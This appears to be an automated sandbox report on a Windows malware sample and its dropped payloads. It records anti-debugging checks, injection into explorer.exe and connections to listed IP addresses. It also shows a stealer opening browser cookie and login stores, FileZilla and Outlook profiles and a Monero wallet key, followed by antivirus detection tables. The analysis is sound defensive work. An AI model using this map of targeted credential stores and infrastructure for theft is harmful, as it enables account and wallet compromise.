                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\AppData\Local\Temp\93B.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\S23UhdW5DH.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401114
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CB070 LoadLibraryW,GetProcAddress,VirtualProtect,8_2_005CB070
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_0055092B mov eax, dword ptr fs:[00000030h]0_2_0055092B
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_00550D90 mov eax, dword ptr fs:[00000030h]0_2_00550D90
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_005DF22D push dword ptr fs:[00000030h]0_2_005DF22D
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C092B mov eax, dword ptr fs:[00000030h]6_2_004C092B
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_004C0D90 mov eax, dword ptr fs:[00000030h]6_2_004C0D90
                Source: C:\Users\user\AppData\Roaming\rghwvveCode function: 6_2_005EE9F5 push dword ptr fs:[00000030h]6_2_005EE9F5
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_023CC0A3 push dword ptr fs:[00000030h]8_2_023CC0A3
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_02590042 push dword ptr fs:[00000030h]8_2_02590042
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_0040AEA4 mov eax, dword ptr fs:[00000030h]10_2_0040AEA4
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_00407D21 mov eax, dword ptr fs:[00000030h]10_2_00407D21
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_00407D21 mov eax, dword ptr fs:[00000030h]16_2_00407D21
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_0040AEA4 mov eax, dword ptr fs:[00000030h]16_2_0040AEA4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CBB00 GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,8_2_005CBB00
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401114
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00403309 SetUnhandledExceptionFilter,8_2_00403309
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_00402F85 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00402F85
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 9_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_006943E0
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 9_2_00694A78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00694A78
                Source: C:\Users\user\AppData\Local\Temp\356F.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exeFile created: 93B.exe.2.drJump to dropped file
                Source: C:\Windows\explorer.exeNetwork Connect: 172.67.213.22 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 2.180.10.7 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 91.215.85.120 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.172.128.19 80Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_02590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,8_2_02590110
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeThread created: C:\Windows\explorer.exe EIP: 2DF1A88Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rghwvveThread created: unknown EIP: 31C1A88Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeMemory written: C:\Users\user\AppData\Local\Temp\572.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\rghwvve Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\rghwvve Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,18_2_00478420
                Source: C:\Users\user\AppData\Local\Temp\572.exe Process created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 10_2_004082B6 CheckTokenMembership,AllocateAndInitializeSid,FreeSid,10_2_004082B6
                Source: explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: explorer.exe, 00000002.00000000.2122711669.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.2121587581.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
                Source: explorer.exe, 00000002.00000000.2121809250.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.2125091063.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,8_2_0040DC53
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_0040E079
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_0040E012
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,8_2_0040DCFA
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,8_2_0040E0B5
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,8_2_0040DD55
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoA,8_2_00411109
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,8_2_0040B1BE
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,8_2_0040A244
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,8_2_0040AED0
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,8_2_004092EC
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,8_2_00404EB4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0040DB5E
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetTickCount,SetLastError,GetConsoleAliasesW,CreateDirectoryW,ResetEvent,InterlockedIncrement,DestroyIcon,_memset,SetDefaultCommConfigW,FreeEnvironmentStringsW,GetCurrentDirectoryA,EnumDateFormatsExA,GetStartupInfoW,GetModuleHandleExA,OpenJobObjectA,GetConsoleAliasesLengthA,DnsHostnameToComputerNameA,WideCharToMultiByte,GetLocaleInfoA,TzSpecificLocalTimeToSystemTime,SetCurrentDirectoryA,MoveFileExW,OpenWaitableTimerA,CompareStringW,GetProcessHeap,_wprintf,_calloc,_calloc,_memset,_calloc,SetProcessWorkingSetSize,8_2_005CBB00
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,8_2_0040DF26
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,8_2_0040B72B
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,8_2_004093C6
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,8_2_00410FD4
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: EnumSystemLocalesA,8_2_0040DFE8
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: GetLocaleInfoA,17_2_004051FC
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: GetLocaleInfoA,17_2_00405248
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: GetLocaleInfoA,18_2_00408570
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: GetLocaleInfoA,18_2_004085BC
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\Temp\572.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\356F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\356F.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CBA50 FreeEnvironmentStringsW,ReadEventLogA,CreateNamedPipeA,FileTimeToLocalFileTime,8_2_005CBA50
                Source: C:\Users\user\AppData\Local\Temp\572.exeCode function: 8_2_005CBF60 GetSystemTimes,GetSystemTimes,FlushFileBuffers,GetVolumeInformationW,FlushFileBuffers,GetVolumeInformationW,8_2_005CBF60
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00455588 GetUserNameA,18_2_00455588
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00405CE4 GetVersionExA,17_2_00405CE4
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.4637171464.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.4668833008.00000000028E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002B.00000002.2973250341.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                Source: Yara matchFile source: 0000002B.00000002.2971930000.0000000000443000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.4637171464.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.4668833008.00000000028E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002B.00000002.2973250341.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: dump.pcap, type: PCAP
                [ATT&CK matrix; tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
                [Behavior graph: ID 1386724, sample S23UhdW5DH.exe, start date 05/02/2024, architecture WINDOWS, score 100]
PE32 81->87 dropped 147 store.steampowered.com 84->147 149 pop3.sii.itzacatepec.edu.mx 84->149 151 2 other IPs or domains 84->151 file25

Source | Detection | Scanner | Label | Link
S23UhdW5DH.exe | 45% | ReversingLabs | Win32.Trojan.CrypterX |
S23UhdW5DH.exe | 53% | Virustotal | | Browse
S23UhdW5DH.exe | 100% | Avira | HEUR/AGEN.1312686 |
S23UhdW5DH.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\Drivers\csrss.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | 88% | ReversingLabs | Win64.Packed.Generic |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exe | 34% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\1EB9.exe | 8% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | 51% | ReversingLabs | Win32.Trojan.Zusy |
C:\Users\user\AppData\Local\Temp\356F.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Smokeloader |
C:\Users\user\AppData\Local\Temp\93B.exe | 87% | ReversingLabs | Win32.Trojan.Pitou |
C:\Users\user\AppData\Local\Temp\BroomSetup.exe | 21% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Local\Temp\FE8B.exe | 50% | ReversingLabs | Win32.Spyware.Lummastealer |
C:\Users\user\AppData\Local\Temp\FourthX.exe | 88% | ReversingLabs | Win64.Packed.Generic |
C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | 61% | ReversingLabs | Win32.Trojan.Nemesis |
